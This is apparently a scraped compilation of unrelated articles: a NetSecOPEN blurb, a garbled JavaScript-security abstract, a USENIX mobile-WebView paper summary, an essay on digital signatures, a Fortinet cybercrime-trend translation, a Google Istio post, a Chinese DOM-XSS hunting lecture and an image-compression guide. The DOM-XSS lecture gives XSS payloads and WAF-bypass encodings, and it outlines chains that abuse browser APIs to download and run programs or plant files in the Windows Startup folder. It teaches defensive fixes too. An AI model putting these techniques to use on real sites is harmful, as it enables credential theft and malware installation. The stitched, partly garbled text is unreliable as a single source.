NetSecOPEN is a network security industry group in which network security vendors, tool vendors, labs, and enterprises collaborate to create open and transparent testing standards. The goal of the group is to create a suite of standards that can be used for the evaluation and/or certification of network security products. The NetSecOPEN standards will provide guidelines and best practices for testing modern network security infrastructure.

NetSecOPEN is working toward being certified as a standards body that will oversee the creation and updating of standards. Additionally, NetSecOPEN will oversee evaluation testing by network security product vendors and certification testing conducted by labs against the standards. Anyone with a vested interest in the outcome can participate in the creation or updating of the standards. These efforts will be conducted in an open and transparent manner, with meeting minutes and the status of the projects posted at https://www.netsecopen.org .

Abstract: “Many important security problems in javascript, such as browser extension security, untrusted JavaScript librari es and safe inte- gration of mutually distrustful websites (mash-ups), may b e effectively addressed using an efficient implementation of information fl ow control (IFC). Unfortunately existing fine-grained approaches to J avaScript IFC require modifications to the language semantics and its engi ne, a non-goal for browser applications. In this work, we take the ideas of c oarse-grained dynamic IFC and provide the theoretical foundation for a lan guage-based approach that can be applied to any programming language for which ex- ternal effects can be controlled. We then apply this formalis m to server- and client-side JavaScript, show how it generalizes to the C programming language, and connect it to the Haskell LIO system. Our metho dology offers design principles for the construction of informatio n flow control systems when isolation can easily be achieved, as well as com positional proofs for optimized concrete implementations of these sys tems, by re- lating them to their isolated variants.”

Meta-note: Tagged this as programming instead of above languages since it’s a language-neutral method. Folks filtering specific languages might be interested in language-neutral aspects.

出处：USENIX Security 2018

作者：Xiaohan Zhang, Yuan Zhang, Min Yang, Xiaofeng Wang, Long Lu, Haixin Duan

单位：School of Computer Science, Fudan University, Shanghai Institute of Intelligent Electronics & Systems, Shanghai Institute for Advanced Communication and Data Science, Shanghai Key Laboratory of Data Science, Fudan University, Indiana University Bloomington , Northeastern University , Tsinghua University

原文链接： https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-zhang_0.pdf

如今，移动App已经成为用户访问Web服务的主要方式。安卓和iOS都提供了丰富的操作Web资源的API，方便开发者在App内部集成Web服务。之前一些学者的工作已经指出了这些API存在的攻击面，也提出了一些防御的机制，但它们都没有给出实际场景下的攻击案例，也没能评估这类攻击所能造成的影响，而这正是这篇文章关注的重点。文章中，作者定义了Web资源的cross-principal manipulation(XPM)问题，实现了XPMChecker这一自动化分析工具，并使用它对Google Play上80694个App进行分析，发现49.2%的Web资源操作都属于XPM，4.8%的App中存在XPM行为，并且超过70%的XPM行为都是针对一些著名的站点。此外，作者还发现有21个App存在明显的恶意行为，如窃取、滥用用户的Cookies、收集用户登录凭证、伪装用户进行登录等。作者也确认了类似的威胁在iOS App中也是存在的，而大多数的Web服务网站尚未意识到这种威胁的存在。

在移动平台，开发者将不同的Web服务集成到同一App中，可以给用户提供更丰富、强大的功能。为了方便集成，Android和iOS都提供App内置Web浏览器的功能来呈现Web内容。这种浏览器在安卓端就是WebView，在iOS端则为UIWebView/WKWebView(下文统称WebView)。在WebView的基础上，移动平台还为开发者提供了丰富的操作Web资源的API来提供更多的功能。比如，安卓和iOS都有evaluatejavascript这一API，允许App在Web页面插入JavaScript代码并返回结果。

受Web平台同源策略的启发，作者定义了移动平台的XPM问题：定义App所操作的Web资源所属方为WP(Web Principal)，操作Web资源的代码所属方为AP(App Principal)，在某一次App操作Web资源时，如果AP!=WP，则认为是一次XPM，XPM给用户带来安全威胁。作者认为App是不可信任的，其中存在两类攻击者：App本身及其集成的三方库。

为了实现大规模的App分析，作者实现自动化分析工具XPMChecker，如下图所示，该工具由三个部分组成： + 静态分析器

文章重点对安卓平台的XPM行为进行了研究，在自动化分析的基础上也加入了很多人工分析，对XPM行为的安全性研究非常深入。不过可能受限于篇幅，作者在文中经常提及iOS端也有类似的XPM行为，却一直没有给出相关的案例进行进一步的说明与解释。

人类总是能够把他们所说的话以书面形式呈现，所以文化需要一种方法来确定文档的起源。一旦能够在纸上交流，就有必要核实纸上所写的字句是否来自合法的发端人。

本文将解释人类如何提供文档的来源，以及不断发展的技术在这一领域中扮演的角色。

历史上的出处

有证据表明，人们首次尝试鉴定文字的起源可以追溯到几百年前。已知最早的记录之一是公元三世纪罗马帝国的提多和安东尼时期。

历史文献表明，早在公元201年，罗马帝国就确立了各种方法，通过这些方法，文献可以被确证和确认为真实。历史表明,:“法学家为确定三世纪的伪造行为和查明伪造行为的方式制定了议定书。”

在对书面文字进行历史验证的早期阶段，人们主要研究手写和书法的其他方面，而签名很快就成为一种简单而强大的工具，能提供可证明的身份。签名也成为对附有签名的文件所载材料或主题背书的一种象征。

签名的类型

签名以多种形式存在。随着科技的发展，文化对文字的确证方式也在不断发展。其中最著名的是湿签名。

湿签名就是用钢笔、铅笔或其他任何书写工具在纸上书写的签名。在历史的早期，湿签名也指那些使用蜡印章或邮票的签名。这个名称来源于这样一个事实:用于添加签名的墨水在签名时是湿的，但最终会干燥。

虽然一些更古老的方法，如蜡印已经逐步淘汰，但湿签名仍然是法律体系识别和识别身份的重要方式之一。

湿签名可以是任何形式，可以容纳不同水平的读写能力和书写能力，这就解释了为什么湿签名在许多文化中如此重要的原因。从法律上讲，湿签名可以是一种复杂的书写形式，例如著名的《美国独立宣言》(Declaration of Independence)上的约翰汉考克(John Hancock)签名，也可以是简单的X，或签名者的首字母。

由于湿签名在法律上和文化上有许多不同之处，这种身份来源的形式并非没有缺陷。历史上有许多人试图复制他人的签名，主要是为了获取经济利益。比如很多家庭成员在富有的父母去世后互相指责对方伪造遗嘱。这些例子在世界上许多国家都很常见。

也许历史上最多产的文件伪造者是约瑟夫凯西。活跃在20世纪20年代的凯西，一个酗酒者，能够以一种非常接近原始签名的方式复制历史签名。据报道，为了一杯饮料的价格，凯西会为那些提出要求的人伪造签名。他成功地、持续地复制了许多著名历史人物的签名，其中包括亚伯拉罕林肯(Abraham Lincoln)和乔治华盛顿(George Washington)。

凯西揭露了湿签名的显著缺点。对于那些在书法方面有天赋的人来说，稍加练习就能复制任何签名。1962年，《法律与犯罪学杂志》(Journal of Law and criminal ology)文章中，宣称伪造签名可能比真正签名写得更巧妙。

伪造或涉嫌伪造的案件不断增加，以及许多法律和学术出版物显示湿签名的缺点，导致许多人认为签名是一种可能徒劳的做法。政府鼓励人们把签名做得更复杂，以减少成功伪造的风险。尽管有这些缺点，但并没有太多的替代办法，因此湿签名在今天仍然很普遍。此外，签署文件不仅是为了纪念一个场合，而且是有关各方的一个重要仪式。

电子签名

随着技术的发展，电子签名出现了。它们有时也被称为合成湿信号。电子签名是由应用程序或服务生成的，这些应用程序或服务将物理湿签名转换为图片或PDF文件，然后将图片或PDF文件附加到数字文档以证明身份。

此类服务的例子包括HelloSign或Pandadoc。这些服务要求用户上传他们的湿签名照片，然后应用程序将其数字化。其他应用程序可以尝试使用草书排版等特性创建新签名。

虽然电子签名在过去几年得到了发展，但它们很少能反映用户原始的湿签名。然而，它们使签署者和文件接受者都感到签署仪式正在得到遵守。通过这种方式，湿签名的数字化不仅仅是提供来源，更具有象征意义。

需要注意的是，与物理湿签名类似，电子签名可以采用多种形式。除数字化湿签名外，电子签名的例子可包括电子邮件末尾的类型化名称、电子表格或文件上的类型化名称、登录安全金融网络的个人识别码(PIN)，以及在电子“条款和协议”合同上单击“同意”或“不同意”等。

其中有些方法比其他方法更安全。长期以来，法律制度不承认电子签名，因为复制一个人签名的数字图像是一件微不足道的事情。例如，如果某人X能够在线或在以前签署的文件上访问某人Y的签名 他们可以简单地使用数字化服务，复制并将其添加到文档中，而不需要Y的识别。

尽管存在这些问题，但随着电子签名服务的发展，电子签名已得到法律承认。电子签名服务使用户能够以一种高度重视安全和来源的方式对文件进行电子签名，以尽量减少假冒伪劣的风险。

在线搜索会产生许多被法律认定为电子签名的方法。2016年7月1日，欧盟颁布了《欧洲身份和信托服务条例》。新法律允许在整个欧盟范围内使用电子签名代替湿签名。不断发展的技术促进了这方面更大程度的安全。

数字签名

数字签名经常与电子签名混淆，但与电子签名不同。数字签名是一种电子签名，因为它们是由电子计算设备创建的。然而，数字签名利用了安全的加密技术，使这一领域目前可能达到的最高安全水平。

与之前的湿签名不同，数字签名不需要手写。相反，它们是一组数学生成的键，允许用户提供他们对所讨论材料的支持。此外，由于它们的设计，数字签名可以确保消息或文档在传输过程中不会被更改。

要理解这是如何工作的，就必须深入研究数字签名是如何创建的。这种类型的签名是通过称为公钥基础设施(PKI)的全球公认标准创建的。PKI是指一组标准化的已建立的实践、角色和策略，通过它们创建、存储和传输数字证书。此外，PKI还定义了如何跨web处理公钥加密。

PKI使用数学算法，使用密码学生成两个密钥――私钥和公钥。签名文档时，用户使用他们的私钥加密数据并生成哈希值。发出加密文档的是数字签名。加密的数据通常包括签名的时间，如果签名者认为合适，可以进行修改。

加密过程中使用的加密技术确保了在没有相应公钥的情况下，任何人都不可能访问数据。

例如，如果X想出售她的房子，并使用她的私钥在地契上签名，那么Y就会收到地契和X的公钥副本。如果公钥无法解密数据，则意味着签名不是X的。

这也可能意味着文档在X签名之后发生了更改。通常，签名会被认为是无效的。通过这种方式，数字签名保护了签名者和接收者。由于数字签名具有很高的安全性，而且对个人来说是独一无二的，所以有时人们会将其视为电子指纹。

以数字货币签署交易

如果您了解数字货币是如何工作的，那么您就知道PKI如何能被加密货币网络所使用。例如，比特币使用一种基于椭圆曲线密码学的PKI方法，称为ECDSA。该方法生成两个密钥，这两个密钥对于在网络上签名和验证事务非常重要。虽然它是一种安全的方法，但是它有它的缺点，特别是在多层事务的情况下。

目前，比特币和以太坊都允许多方授权交易。但是，它们必须首先创建一个新签名。虽然这种方法有效，但它的主要缺点是它揭示了有关各方正在一起工作的事实。随着对隐私和金融主权的日益关注，目前比特币网络中多团体架构的这方面，以及其他加密货币，是一个重大缺陷。

此外，许多加密货币中的当前多符号设置效率低下，因为事务中涉及的当事方越多，所产生的聚合签名的大小也就越大。这也会影响对多事物交易收取的费用。膨胀的事务大小会导致网络膨胀，从而延迟结算速度。

Schnorr聚集方法

为了解决跨数字货币的多团体设置中出现的效率低下问题，人们开始关注Schnorr聚合方法。这个方法以数学家克劳斯施诺(Claus Schnorr)的名字命名，它以一种相对简单的方式解决了这些挑战。

Schnorr签名本质上支持将多个签名及其对应键聚合到单个签名中。因此，来自单个签名的Schnorr多团体事务是不可察觉的。这个简单的修复消除了隐私和大小方面的问题。

此外，Schnorr聚合方法否定了为适应多团体事务而编写新代码所固有的安全风险。Schnorr多团体事务是在密码学层而不是脚本层中处理的，这消除了脚本错误的可能性。

Schnorr方法是线性的，不幸的是，它也存在问题。简单地说，组合两个Schnorr签名也会生成一个有效的Schnorr签名。这可以为恶意参与者提供一个攻击向量。然而，需要注意的是，这仍然是一个理论向量，在实际应用中可能不可行。

然而，区块链对Schnorr签名的持续研究已经找到了一种降低任何风险的方法。格雷戈里马克斯韦尔(Gregory Maxwell)、安德鲁波尔斯特拉(Andrew Poelstra)、亚尼克休林(Yannick Seurin)和彼得维尔(Pieter Wuille)在他们的论文《简单的Schnorr多重签名与比特币应用》(Simple Schnorr multi-signature with Applications to Bitcoin)中描述了Schnorr签名是“一种新的多重签名方案，它可以改善比特币的性能和用户隐私问题”。为了达到这一目的， Wuille和他的同行们还引入了一个BIPdesigned用来在比特币的底层代码基上附加Schnorr签名。

如果比特币网络能够成功实现这一升级(这将通过一个软分支实现)，那么其他加密货币很可能会效仿。Schnorr签名代表了在加密货币中以安全而私有的方式证明身份的自然过程。

原作者 Derek Manky

安天公益翻译组翻译

各机构现在就要着手防范 2019 年的威胁了， 特别要警惕使用人工智能（ AI）“模糊测试” 技术、 机器学习技术和“集群”（ swarm） 技术的网络犯罪分子。

为了管理日益分散和复杂的网络， 各机构正在采用人工智能（ AI）和机器学习技术，将繁琐、 耗时、通常需要大量人工监督和干预的活动自动化。 网络犯罪团伙适应安全生态系统的这一转变， 也开始朝着这一技术方向演进。

根据 Fortinet 公司《2019 年威胁全景预测》报告， 本文总结了五个新兴的恶意趋势。

零日漏洞利用主要涉及未知的威胁向量，因此对犯罪团伙来说，此技术常常特别有效。幸运的是， 发现和利用零日漏洞涉及一种称为“模糊测试”的技术， 这需要大量的时间和专业知识， 因此零日漏洞并不常见。

模糊测试是一项复杂的技术， 专业威胁研究人员经常在实验室环境中使用该技术， 来识别硬件和软件接口及应用程序中的漏洞。他们将无效、异常或半随机数据注入接口或程序，然后监控崩溃、 未记录的跳转、 调试例程、失效代码和内存泄漏等事件， 以此来识别漏洞。目前，大多数网络犯罪分子还不具备通过模糊测试寻找零日漏洞的能力。 但是， 随着人工智能和机器学习模型在模糊测试中的应用， 该技术将会变得更加高效和有效。因此， 网络犯罪分子将会发现更多的零日漏洞，而这也会对网络设备和系统的保护产生重大影响。

虽然大量的已知漏洞仍在肆虐，但是攻击者实际上只利用了这其中不到 6％的漏洞。 然而，在一些具体的对抗场景中，我们无从知晓犯罪团伙会利用哪些具体漏洞，因此就要求安全工具不得不监控所有这些 6%的安全漏洞。 此外， 随着潜在威胁的数量持续增长， 以及潜在漏洞利用的范围不断扩大， 各机构对安全工具的性能要求不断升级。为了跟上这些要求，安全工具需要越来越智能地检测威胁（备注： 原文有错误）。

虽然一些框架（ 如“零信任” 环境） 可以防御威胁，但是公平地说，大多数机构都没有为即将到来的下一代威胁（特别是那些基于 AI 的模糊测试技术） 做好准备。传统的安全方法，例如对已知攻击的修复或监控， 很可能会过时，因为它们无法预测设备的哪个方面可能会被利用。在一个无休止且高度商品化的零日攻击环境中，即使是用于检测未知威胁的工具（如沙箱） 也会很快被攻破。

基于集群的智能技术不断进步， 这使得我们更容易受到基于集群的僵尸网络的攻击。 这些所谓的“集群” 僵尸网络可以协同、 自主地运行， 以攻破现有的防御系统。这些集群僵尸网络不仅会提高保护各机构的技术门槛，而且，就像零日挖矿一样，它们还会对潜在的犯罪商业模式产生影响， 为网络犯罪分子提供更多的机会。

目前，犯罪生态系统是由“人” 驱动的。 专业黑客通过挖掘自定义的漏洞利用代码来获取不当收益。 甚至像“勒索软件即服务”（ Ransomware-as-a-Service， RaaS） 这样的新技术也需要专业黑客来整合不同的资源。但是，当提供自主的、 自我学习的“集群即服务” 时，客户和专业黑客之间的直接交互量将急剧下降，从而降低了专业黑客被发现的风险， 于此同时还能提高黑客的盈利能力。

将集群划分为多个任务以实现预期结果， 这与虚拟化非常相似。在虚拟网络中，可以根据需要增加或减少虚拟机，以解决带宽等问题。同样， 在集群网络中，可以分配或重新分配资源，以解决攻击链中遇到的特定挑战。在“集群即服务” 环境中，犯罪分子利用一系列分析工具和漏洞利用代码， 对“集群”（ swarm） 的各个部分进行预编程，包括感染策略、 规避策略和秘密数据泄露策略等。 此外， 集群中有一种“自我集群”（ self-swarm），它们几乎不需要来自集群主机的交互或反馈，也不需要与 C&C 中心交互。 这能够克服大多数漏洞利用的致命弱点。

机器学习是最有前途的网络安全工具之一。 各机构可以训练设备和系统， 使它们自主地执行特定任务， 如确定行为基准，应用行为分析来识别复杂的威胁，或者在面对复杂的威胁时采取有效的对策等。繁琐的手动任务， 如跟踪和修复设备，也可以移交给经过适当训练的系统。但是， 机器学习技术可能是一把“双刃剑” ――它们无法识别“好”和“坏”，因此它们也会执行蓄意的恶意指令。通过攻击机器学习过程并投毒，网络犯罪分子可以训练设备或系统， 使其不对特定设备打补丁或执行更新，忽略特定类型的应用程序或行为，或不记录特定流量， 使犯罪分子更好地规避检测。

上文介绍了一些最具前瞻性的恶意行为者的前进方向。为了有效地进行防御， 各机构应重新考虑他们当前的安全策略。鉴于目前的全球威胁形势， 各机构必须以机器速度应对威胁――机器学习和人工智能技术能够对此提供帮助。 将机器语言和 AI 集成到整个分布式网络中的端点产品中，结合自动化和创新， 能够有效地帮助各机构打击日益激进的网络犯罪。然而， 需要注意的是， 网络犯罪分子将很快采用相同的技术来对抗我们， 我们应该为此做好准备。

查看原文：https://www.darkreading.com/endpoint/5-emerging-trends-in-cybercrime/a/d-id/1333363

声明：本文来自中国信息安全，版权归作者所有。文章内容仅代表作者独立观点，不代表安全内参立场，转载目的在于传递更多信息。如需转载，请联系原作者获取授权。

It’s no wonder so many organizations have moved all or part of their IT to the cloud; it offers a range of powerful benefits. However, making the jump is often easier said than done. Many organizations have a significant on-premises IT footprint, aren’t quite cloud-ready, and constrained by regulations or lack of consistent security and operating model across on-premises and the cloud.

We are dedicated to helping you modernize your existing on-premises IT and move to the cloud at a pace that works for you. To do that, we are leading the charge on a number of open-source technologies for containers and microservices-based architectures. Let’s take a look at some of these and how they can help your organization prepare for a successful journey to the cloud.

Toward an open cloud stack

At Google Cloud Next ‘18, we announced Cloud Services Platform , a fully managed solution based on Google open-source technologies. With Cloud Services Platform, you have the tools to transform your IT operations and build applications for today and the future, using containerized infrastructure and a microservices-based application architecture.

Cloud Services Platform combines Kubernetes for container orchestration with Istio, the service management platform, helping you implement infrastructure, security, and operations best practices. The goal is to bring you increased velocity and reliability, as well as to help manage governance at the scale you need. Today, we are taking another step towards this vision with Istio on GKE.

Think services first with Istio

We truly believe that Istio will play a key role in helping you make the most of your microservices. One way Istio does this is to provide improved visibility and security, making working with containerized workloads easier. With Istio on GKE, we are the first major cloud provider to offer direct integration to a Kubernetes service and simplified lifecycle management for your containers.

Istio is a service mesh that lets you manage and visualize your applications as services, rather than individual infrastructure components. It collects logs, traces, and telemetry, which you can use to set and enforce policies on your services. Istio also lets you add security by encrypting network traffic, all while layering transparently onto any existing distributed application―you don’t need to embed any client libraries in your code.

Istio securely authenticates and connects your services to one another. By transparently adding mTLS to your service communication, all information is encrypted in transit. Istio provides a service identity for each service, allowing you to create service-level policies that are enforced for each individual application transaction, while providing non-replayable identity protection.

Out of the gate, you can also benefit from Istio’s visibility features thanks to its integration with Stackdriver, GCP’s native monitoring and logging suite. This integration sends service metrics, logs, and traces to Stackdriver, letting you monitor your golden signals (traffic, error rates, and latencies) for every service running in GKE.

Istio 1.0 was a key step toward helping you manage your services in a hybrid world, where multiple workloads run in different environments―clouds and on-premises, in containerized microservices or monolithic virtual machines. With Istio on GKE, you get granular visibility, security, and resilience for your containerized applications, with a dead-simple add-on that works out-of-the-box with all your existing applications.

Using Istio on GKE

The service-level view and security that Istio delivers are especially important for distributed applications deployed as containerized microservices, and Istio on GKE lets you deploy Istio to your Kubernetes clusters with the click of a button.

Istio on GKE works with both new and existing container deployments. It lets you incrementally roll out features, such as Istio security, bringing the benefits of Istio to your existing deployments. It also simplifies Istio lifecycle management by automatically upgrading your Istio deployments when newer versions become available.

Today’s Beta availability of Istio on GKE is just the latest of many advancements we have made to make GKE the ideal choice for enterprises. Try Istio on GKE today by visiting the Google Cloud Platform console . To learn more please visit cloud.google.com/istio or the Istio on GKE documentation.

Enhancing GKE networking

Earlier this year we announced many new networking features for GKE, including VPC-native clusters , Shared VPC , container-native load balancing and container-native network services for applications running on GKE and self-managed Kubernetes in Google Cloud.

We also announced new features to help simplify the configuration of containerized deployments, with some backend and frontend config enhancements. These improvements make everything easier, from identity and access management for network resources to better controls for CDN, Cloud Armor, and load balancing for easier application delivery.

Improving GKE security

GCP helps you secure your container environment at each stage of the build-and-deploy lifecycle with software supply chain and runtime security tools. These include integrations to tools from multiple security partners, all on top of Google’s security-focused infrastructure and security best practices. New features like node auto-upgrade and private clusters increase the security options available to GKE users. You can read more about new security features in GKE in “ Exploring Containers Security: This year it’s about security. ”

XSS(Cross-site scripting)是一种常见的web漏洞，按XSS payload位置的不同，分为反射型、存储型和DOM型XSS。

攻击者可以通过让受害者访问构造好的恶意链接，实现劫持、钓鱼、窃取登陆凭证（通常指document.cookie）。

由于javascript的灵活性较高，所以DOM-XSS在web应用中，也是一种较难防御和修复，且出现的场景较多的漏洞。

JSRC安全小课堂第122期，邀请到Camaro作为讲师就DOM-XSS漏洞挖掘为大家进行分享。同时感谢小伙伴们的精彩讨论。

京安小妹：DOM-XSS出现的常见位置？

一、URL代入页面

这类DOM-XSS是最常见的，它的漏洞点通常是以下形式出现。

它出现的地方比较多，可能会是名称，地点，标题等等。

大多数情况下它和反射型XSS的区别不大，最大的区别是取的值不同。

来看代码中的第二行

此时取值时，匹配的URL是location.href，这个值包含了location.search和location.hash的值，而location.hash的值是不被传到服务器，并且能被前端JS通过getUrlParam函数成功取值。

二、跳转类

在javascript语法中，使用如下代码可以将页面进行跳转操作

这样的跳转通常会出现在登录页、退出页、中间页。

如果开发者让用户可以控制redirecturl参数，就可以使用javascript:alert(1)的形式进行XSS攻击。

最近几年的APP开发比较热门，通过web唤起APP的操作也是越来越多，跳转的协议也是多种多样，例如webview://,myappbridge://等等。 仅仅使用http和https来判断URL是否合法已经不适用了，于是由跳转所产生的DOM-XSS漏洞也逐渐增多。

三、缓存类

开发者在缓存前端数据的时候，通常会存在sessionStorage,localStorage,cookie中，因为sessionStorage在页面刷新时就失效的特性，利用方式相对简单的只有后面两种。

根据浏览器的同源策略，Cookie是可以被子域名读到的。 一旦我们发现在http://example.com/setCookie.php?key=username&value=password下可以设置Cookie,就可以结合一些读取Cookie的页面进行XSS攻击。

localStorage的特性和Cookie类似，但它和Cookie不同的是，Cookie被设置过之后，具有有效期这个特性，而localStorage被设置过后，只要不手动清除或覆盖，这个值永远不会消失。 Cookie中通常会存放少量的缓存信息，像用户的头像URL，用户名等等，而localStorage中通常会存放一些大量，需要重复加载的数据，如搜索历史记录，缓存JS代码等等。

这些值被修改过以后，大部分开发者都不会去校验它的合法性，是否被修改过。

四、postMessage

postMessage可以跨域使用，使用场景比较广泛，如支付成功的回调页面。

五、window.name

window.name与其他window对象不同，它在窗口刷新后会保留。 例如

当这个页面刷新跳转到其他网站时，如果这个网站没有对window.name进行设置，那么当前window.name的值仍然是Foo

京安小妹：DOM-XSS优势在哪里？

一、避开WAF

正如我们开头讲的第一种DOM-XSS，可以通过 location.hash 的方式，将参数写在 # 号后，既能让JS读取到该参数，又不让该参数传入到服务器，从而避免了WAF的检测。

我们可以使用 ja%0avasc%0aript:alert(1) , jx61vascript:alert(1) 的形式绕过

可以利用 postMessage,window.name,localStorage 等攻击点进行XSS攻击的，攻击代码不会经过WAF。

二、长度不限

当我们可以用当前页面的变量名作为参数时，可以使用 <iframe src="http://example.com/?poc=name"> 的方式进行攻击。

三、隐蔽性强

攻击代码可以具有隐蔽性，持久性。例如使用Cookie和localStorage作为攻击点的DOM-XSS，非常难以察觉，且持续的时间长。

京安小妹：DOM-XSS巧妙利用的方式？

Camaro：

我们熟知的XSS利用方式有窃取Cookie，钓鱼页面，盲打后台地址。如果你对这个网站的框架比较熟悉的话，甚至可以让管理员上传一个WebShell。

接下来我们要分享的是，如何通过XSS来实现客户端RCE。

我们知道，chromium支持开发者扩展api。厂商在开发浏览器的时候，或是为了自己的业务需求，或是出于用户体验，会给浏览器扩展上一些自己的接口，这些接口比较隐蔽，且只接口来自于信任域名的数据。 但是如果我们有一个特殊域名下的XSS，或者这个特殊域名可以被跨域，我们甚至可以找任意一个当前域名的XSS对它进行攻击。

通过以下代码就可以对当前页面下的 chrome 对象进行遍历。

有一款浏览器，它的接口特别丰富，现在给大家分享以下之前的调试过程。

京安小妹：DOM-XSS案例分析?

Camaro：

案例一:

首先从业务入手，找到了一个叫做game.html的页面，我们观察到页面上大部分是游戏，使用了上面的代码对chrome对象进行遍历之后，发现了browser_game_api的对象，这个继续遍历这个api，看它有哪些变量、函数和对象。

这时候我们发现了一个函数叫做 downloadAndRun ，从函数名来看，这个函数执行的操作是比较危险的。那么这些函数的参数是什么的，我们不知道，就需要从这个特殊域名下面的页面中去找。 根据函数名搜索，很快就找到了这个函数调用的地方。于是构造攻击代码：

又因为这个站点将自己的domain设置成了example.com，于是我们可以通过其他exmaple.com下的XSS来调用它页面下的接口。

首先发现了https://exmaple.com/下的一个XSS，利用XSS将当前页面的document.domain设置为example.com，这样它就和game.html同域了。

接下来在XSS页面执行以下代码，即可在新的窗口弹出putty.exe。

案例二:

继续遍历Api，我们又发现了一个特殊的接口，用于设置用户的偏好，其中就包含设置下载目录和设置静默下载。

于是我们想到了另一种攻击方式，就是通过调用它自带的设置偏好接口，将用户的下载目录设置为window的启动目录 C:\Users\User\AppData\Roaming\Microsoft\windows\Start Menu\Programs\Startup

同样的，找到一个 exmaple.com 下的XSS，将自身的 domain 设置成 exmaple.com ，再使用 window.opener 的方式，调用特殊权限页面的接口进行攻击。

案例三:

说完了针对windows的漏洞，再和大家一起分享一个安卓上的XSS利用技巧。

早在2014年12月12日，Rapid7报告了一个漏洞。利用浏览器的UXSS实现在 Android 4.3 或更低版本的系统上安装任意APP。 这个漏洞利用了三点：

第一点使用了UXSS作为攻击手段，在 play.google.com 下调用安装APP的代码

第二点利用了 play.google.com 的可被嵌套的缺陷。我们知道在Android上是没有 window.opener 这个属性的，不能通过 window.open 一个窗口再调用它的函数。还有一种利用的方式是通过 iframe 对它进行调用。

第三点，play.google.com 的安装机制，是在用户登录了浏览器之后就可以唤起 Google Play 进行安装。

结合这三点，就完全满足了XSS利用的条件。

来看一下完整的攻击流程

首先攻击者注册成为Google开发者，在应用市场上发布了一款叫做 backdoor_app 的应用。

接着将play.google.com嵌套至攻击页面中，利用UXSS调用安装代码。

谷歌市场启动，在后台进行安装应用。

京安小妹：DOM-XSS防御手段？

1.对于写标签类的DOM型XSS，输出到HTML中例如

document.getEelementById("id") = innerHTML = "<img src=x onerror=alert(1)>"只需要将<>实体化即可，将<>替换成&lt;&gt;

2.对于跳转类的XSS，例如

location.href = "javascript:alert(1)"有一个简单的方法，就是将这个url创建成一个a标签，检查它的host是否合法，是否以http或指定的协议开头，否则视为非法跳转。

3.对于eval(string)类的XSS

不建议使用这种写法，一个负责的开发不应该写这种代码出来。

如果实在要用，需要过滤非常多的字符，双引号，单引号，反引号，等于号，小括号，点，加减乘除，和一些特殊的字符，例如name,top,parent,opener等等（以上列出不完全）

经过多个版本迭代，项目在 release 配置下的打包体积依旧轻松破百，应用体积过大导致的问题包括：

通常来说，资源文件能在应用体积包中占据 1/3 或者更多的体积，相比起代码 （5kb/千行） 的平均占用来说，对图片进行减包是最直接高效的手段，对图片资源的处理方式包括四种：

考虑到由于项目开发分工的问题， 方式1 需要推动落地，所以本文不讨论这种处理方式。其他三种都能通过编写脚本实现自动化处理

图片压缩分为 有损压缩 和 无损压缩 两类， 有损压缩 放弃了一部分图片的质量换取更高的压缩比。网上主流的压缩工具有 tinypng 、 pngquant 、 ImageAlpha 和 ImageOptim 等，分别采用了一种或者多种压缩技术完成图片压缩

由于 png 格式的灵活性，同一张图片可以使用多种方式进行表示，不同方式占用的大小不一样。一般的软件会采用效率更高的方式来表示图片，所以这种情况下 png 图片存在巨大的优化空间。通常来说，从 png 文件中能去除的数据包括：

png 图片有两种类型的数据块，一种是必不可缺的数据块称为 关键数据块 。另一种叫做 辅助数据块 ， png 文件格式规范指定的辅助数据块包括：

其中 tEXt 和 zTXt 数据段中存在的数据包括：

由上可见，辅助数据块在 png 文件中可能占据了极大的篇幅，正是这些数据块构成了 png 的无损压缩条件

tinypng 采用了一种称作 Quantization 的压缩技术，通过合并图片中相似的颜色，将 24bit 的图片文件压缩成 8bit 图片，同时去除图片中不必要的元数据，图片最高能达到 70% 以上的压缩率。截止文章完成之前， tinypng 仅提供了线上压缩功能，暂未提供工具下载

根据官方介绍， pngquant 将 24bit 以上的图片转换成 8bit 的保留透明度通道的压缩图片，压缩算法的压缩比非常显著，通常都能减少 70% 的大小。 pngquant 提供了命令行工具来完成解压任务：

命令行更多调试参数可以在 官网 参阅

ImageAlpha 是一个 macOS 系统下的有损图片压缩工具，内置了 pngquant 、 pngnq-s9 等多个压缩工具，多数情况下通过将图片降至 8bit 来获取高压缩比。由于 ImageAlpha 的可视化界面无法批量处理图片，直接使用提供的命令工具可以实现批量压缩图片：

使用 ImageAlpha 需要注意两点：

在使用 有损压缩 时需要注意单张 png 图片是可以被多次压缩的，但这会导致图片的清晰度和色彩都受到影响，不建议对图片超过一次以上的 有损压缩

ImageOptim 是介绍的四种工具中唯一的 无损压缩 ，它采用了包括 去除exif信息 、 重新排列像素存储方式 等手段实现图片的压缩。 无损 代表着一张图片被 ImageOptim 压缩后，后续无法再次进行压缩，同时它的压缩比往往比不上其他的 有损压缩 方案，但最大程度上保证了图片的原始清晰度和色彩

ImageOptim 同样存在可视化的工具并且支持批量压缩图片

考虑到 ImageAlpha 几乎都是使用 pngquant 作为压缩工具，因此只列出三种压缩工具的对比：

测试图片采用 qq 聊天截图生成的 png ， tinypng 压缩率非常高，而 pngquant 的表现不尽人意

通常来说，出现重复图片的原因包括 模块间需求开发没有打通 或是 缺少统一的图片命名规范 。通过图片 MD5 摘要是识别重复图片的最快方法，以 python 为例，匹配重复图片的代码如下：

在遍历中以文件 MD5 字符串作为 key ，维护具备相同 MD5 的图片路径，最后遍历这个 map 查找存在一个以上路径的数组并且输出

相似图片在图片内容、色彩上都十分的接近，多数时间可以考虑复用这些图片，但相似图片的问题在于无法通过 MD5 直接匹配。为了确认两个图片是否相似，要使用简单的一个数学公式来帮忙查找：

方差。在概率论和统计学中，一个随机变量的方差描述的是它的离散程度，也就是该变量离其期望值的距离

举个例子，甲同学五次成绩分别是 65, 69, 81, 89, 96 ，乙同学五次成绩是 82, 80, 77, 81, 80 ，两个人平均成绩都是 80 ，但是引入方差公式计算：

平均值相同的情况下，方差越大，说明数据偏离期望值的情况越严重。方差越接近的两个随机变量，他们的变化就越加趋同，获取方差代码如下：

因此将图片划分成连串的一维数据，以此计算出图片的方差，通过方差匹配可以实现一个简单的图片相似度判断工具，实现前还要注意两点：

最终将图片转换成一维数据列表的代码如下：

将图片转成灰度图后，仍然可能存在 RGB 色值不同但灰度值相同的情况导致判断失准，可以考虑两种方案提高算法的检测准确率：

经过两轮图片减包处理后，整个项目资源产生的减包量约有 20M ，其中通过文中的三种手段产生的减包量在 6.5M 左右，整体上来看产出还是比较可观的

如果举办一届安全运维人员吐槽大会，想必会收到很多人的共鸣。

人少活多，活忒多；

